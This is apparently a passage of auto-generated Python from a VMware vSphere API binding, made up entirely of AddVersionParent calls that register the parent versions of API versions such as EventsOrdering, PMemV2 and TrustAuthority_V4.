AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version2")
AddVersionParent("vim.version.VM_OP_NOTIFICATION_TO_APP_V1", "vim.version.version3")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version4")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version3")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vmodl.query.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version0")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v6_9_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v6_8_7")
AddVersionParent("vim.version.EventsOrdering", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version13")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version14")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version15")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version10")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version11")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version12")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.EventsOrdering")
AddVersionParent("vim.version.EventsOrdering", "vim.version.v7_0")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version8")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version9")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version6")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version7")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version1")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version4")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version5")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version2")
AddVersionParent("vim.version.EventsOrdering", "vim.version.version3")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version4")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version3")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version2")
AddVersionParent("vim.version.PMemV2", "vmodl.query.version.version1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version0")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version1")
AddVersionParent("vim.version.PMemV2", "vmodl.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.v6_9_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.PMemV2", "vim.version.v6_8_7")
AddVersionParent("vim.version.PMemV2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.PMemV2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.PMemV2", "vim.version.version13")
AddVersionParent("vim.version.PMemV2", "vim.version.version14")
AddVersionParent("vim.version.PMemV2", "vim.version.version15")
AddVersionParent("vim.version.PMemV2", "vim.version.version10")
AddVersionParent("vim.version.PMemV2", "vim.version.version11")
AddVersionParent("vim.version.PMemV2", "vim.version.version12")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.PMemV2", "vim.version.PMemV2")
AddVersionParent("vim.version.PMemV2", "vim.version.v7_0")
AddVersionParent("vim.version.PMemV2", "vim.version.version8")
AddVersionParent("vim.version.PMemV2", "vim.version.version9")
AddVersionParent("vim.version.PMemV2", "vim.version.version6")
AddVersionParent("vim.version.PMemV2", "vim.version.version7")
AddVersionParent("vim.version.PMemV2", "vim.version.version1")
AddVersionParent("vim.version.PMemV2", "vim.version.version4")
AddVersionParent("vim.version.PMemV2", "vim.version.version5")
AddVersionParent("vim.version.PMemV2", "vim.version.version2")
AddVersionParent("vim.version.PMemV2", "vim.version.version3")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.version13")
AddVersionParent("vim.version.v7_0", "vim.version.version14")
AddVersionParent("vim.version.v7_0", "vim.version.version15")
AddVersionParent("vim.version.v7_0", "vim.version.version10")
AddVersionParent("vim.version.v7_0", "vim.version.version11")
AddVersionParent("vim.version.v7_0", "vim.version.version12")
AddVersionParent("vim.version.v7_0", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0", "vim.version.version8")
AddVersionParent("vim.version.v7_0", "vim.version.version9")
AddVersionParent("vim.version.v7_0", "vim.version.version6")
AddVersionParent("vim.version.v7_0", "vim.version.version7")
AddVersionParent("vim.version.v7_0", "vim.version.version1")
AddVersionParent("vim.version.v7_0", "vim.version.version4")
AddVersionParent("vim.version.v7_0", "vim.version.version5")
AddVersionParent("vim.version.v7_0", "vim.version.version2")
AddVersionParent("vim.version.v7_0", "vim.version.version3")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version4")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version3")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.query.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v6_9_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v6_8_7")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version13")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version14")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version15")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version10")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version11")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version12")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.v7_0")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.FileLockInfo_GSS34")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version8")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version9")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version6")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version7")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version1")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version4")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version5")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version2")
AddVersionParent("vim.version.FileLockInfo_GSS34", "vim.version.version3")
AddVersionParent("vim.version.version8", "vmodl.query.version.version4")
AddVersionParent("vim.version.version8", "vmodl.query.version.version3")
AddVersionParent("vim.version.version8", "vmodl.query.version.version2")
AddVersionParent("vim.version.version8", "vmodl.query.version.version1")
AddVersionParent("vim.version.version8", "vmodl.version.version0")
AddVersionParent("vim.version.version8", "vmodl.version.version1")
AddVersionParent("vim.version.version8", "vmodl.version.version2")
AddVersionParent("vim.version.version8", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version8", "vim.version.version8")
AddVersionParent("vim.version.version8", "vim.version.version6")
AddVersionParent("vim.version.version8", "vim.version.version7")
AddVersionParent("vim.version.version8", "vim.version.version1")
AddVersionParent("vim.version.version8", "vim.version.version4")
AddVersionParent("vim.version.version8", "vim.version.version5")
AddVersionParent("vim.version.version8", "vim.version.version2")
AddVersionParent("vim.version.version8", "vim.version.version3")
AddVersionParent("vim.version.version9", "vmodl.query.version.version4")
AddVersionParent("vim.version.version9", "vmodl.query.version.version3")
AddVersionParent("vim.version.version9", "vmodl.query.version.version2")
AddVersionParent("vim.version.version9", "vmodl.query.version.version1")
AddVersionParent("vim.version.version9", "vmodl.version.version0")
AddVersionParent("vim.version.version9", "vmodl.version.version1")
AddVersionParent("vim.version.version9", "vmodl.version.version2")
AddVersionParent("vim.version.version9", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version9", "vim.version.version8")
AddVersionParent("vim.version.version9", "vim.version.version9")
AddVersionParent("vim.version.version9", "vim.version.version6")
AddVersionParent("vim.version.version9", "vim.version.version7")
AddVersionParent("vim.version.version9", "vim.version.version1")
AddVersionParent("vim.version.version9", "vim.version.version4")
AddVersionParent("vim.version.version9", "vim.version.version5")
AddVersionParent("vim.version.version9", "vim.version.version2")
AddVersionParent("vim.version.version9", "vim.version.version3")
AddVersionParent("vim.version.version6", "vmodl.query.version.version3")
AddVersionParent("vim.version.version6", "vmodl.query.version.version2")
AddVersionParent("vim.version.version6", "vmodl.query.version.version1")
AddVersionParent("vim.version.version6", "vmodl.version.version0")
AddVersionParent("vim.version.version6", "vmodl.version.version1")
AddVersionParent("vim.version.version6", "vim.version.version6")
AddVersionParent("vim.version.version6", "vim.version.version1")
AddVersionParent("vim.version.version6", "vim.version.version4")
AddVersionParent("vim.version.version6", "vim.version.version5")
AddVersionParent("vim.version.version6", "vim.version.version2")
AddVersionParent("vim.version.version6", "vim.version.version3")
AddVersionParent("vim.version.version7", "vmodl.query.version.version4")
AddVersionParent("vim.version.version7", "vmodl.query.version.version3")
AddVersionParent("vim.version.version7", "vmodl.query.version.version2")
AddVersionParent("vim.version.version7", "vmodl.query.version.version1")
AddVersionParent("vim.version.version7", "vmodl.version.version0")
AddVersionParent("vim.version.version7", "vmodl.version.version1")
AddVersionParent("vim.version.version7", "vmodl.version.version2")
AddVersionParent("vim.version.version7", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.version7", "vim.version.version6")
AddVersionParent("vim.version.version7", "vim.version.version7")
AddVersionParent("vim.version.version7", "vim.version.version1")
AddVersionParent("vim.version.version7", "vim.version.version4")
AddVersionParent("vim.version.version7", "vim.version.version5")
AddVersionParent("vim.version.version7", "vim.version.version2")
AddVersionParent("vim.version.version7", "vim.version.version3")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version4")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version3")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.query.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version0")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v6_9_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v6_8_7")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version13")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version14")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version15")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version10")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version11")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version12")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.v7_0")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version8")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version9")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version6")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version7")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.DiskGroupVMC")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version1")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version4")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version5")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version2")
AddVersionParent("vim.version.DiskGroupVMC", "vim.version.version3")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version4")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version3")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.query.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version0")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v6_9_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v6_8_7")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version13")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version14")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version15")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version10")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version11")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version12")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.v7_0")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version8")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version9")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version6")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version7")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.TrustAuthority_V4")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version1")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version4")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version5")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version2")
AddVersionParent("vim.version.TrustAuthority_V4", "vim.version.version3")
AddVersionParent("vim.version.version1", "vmodl.query.version.version1")
AddVersionParent("vim.version.version1", "vmodl.version.version0")
AddVersionParent("vim.version.version1", "vim.version.version1")
AddVersionParent("vim.version.version4", "vmodl.query.version.version1")
AddVersionParent("vim.version.version4", "vmodl.version.version0")
AddVersionParent("vim.version.version4", "vim.version.version1")
AddVersionParent("vim.version.version4", "vim.version.version4")
AddVersionParent("vim.version.version4", "vim.version.version2")
AddVersionParent("vim.version.version4", "vim.version.version3")
AddVersionParent("vim.version.version5", "vmodl.query.version.version2")
AddVersionParent("vim.version.version5", "vmodl.query.version.version1")
AddVersionParent("vim.version.version5", "vmodl.version.version0")
AddVersionParent("vim.version.version5", "vmodl.version.version1")
AddVersionParent("vim.version.version5", "vim.version.version1")
AddVersionParent("vim.version.version5", "vim.version.version4")
AddVersionParent("vim.version.version5", "vim.version.version5")
AddVersionParent("vim.version.version5", "vim.version.version2")
AddVersionParent("vim.version.version5", "vim.version.version3")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version4")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version3")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.query.version.version1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.version.version0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.version.version1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.version.version2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v6_9_1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v6_8_7")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version13")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version14")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version15")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version10")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version11")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version12")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.v7_0")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version8")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version9")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version6")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version7")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version1")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version4")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version5")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.SRIOVValidNumVFs")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version2")
AddVersionParent("vim.version.SRIOVValidNumVFs", "vim.version.version3")
AddVersionParent("vim.version.version2", "vmodl.query.version.version1")
AddVersionParent("vim.version.version2", "vmodl.version.version0")
AddVersionParent("vim.version.version2", "vim.version.version1")
AddVersionParent("vim.version.version2", "vim.version.version2")
AddVersionParent("vim.version.version3", "vmodl.query.version.version1")
AddVersionParent("vim.version.version3", "vmodl.version.version0")
AddVersionParent("vim.version.version3", "vim.version.version1")
AddVersionParent("vim.version.version3", "vim.version.version2")
AddVersionParent("vim.version.version3", "vim.version.version3")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.query.version.version4")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.query.version.version3")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.query.version.version2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.query.version.version1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.version.version0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.version.version1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.version.version2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v6_9_1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v6_8_7")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version13")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version14")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version15")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version10")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version11")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version12")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.v7_0")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version8")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version9")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version6")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version7")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version1")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version4")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version5")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version2")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.version3")
AddVersionParent("vim.version.NDU_VSPHERE_HA_INTEGRATION", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.query.version.version4")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.query.version.version3")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.query.version.version2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.query.version.version1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.version.version0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.version.version1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.version.version2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v6_9_1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v6_8_7")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version13")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version14")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version15")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version10")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version11")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version12")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.v7_0")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version8")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version9")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version6")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version7")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version1")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version4")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version5")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version2")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.version3")
AddVersionParent("vim.version.VmxRebootPowerOff", "vim.version.VmxRebootPowerOff")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.query.version.version4")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.query.version.version3")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.query.version.version2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.query.version.version1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.version.version0")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.version.version1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.version.version2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v6_9_1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v6_8_7")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v8_0_0_0")
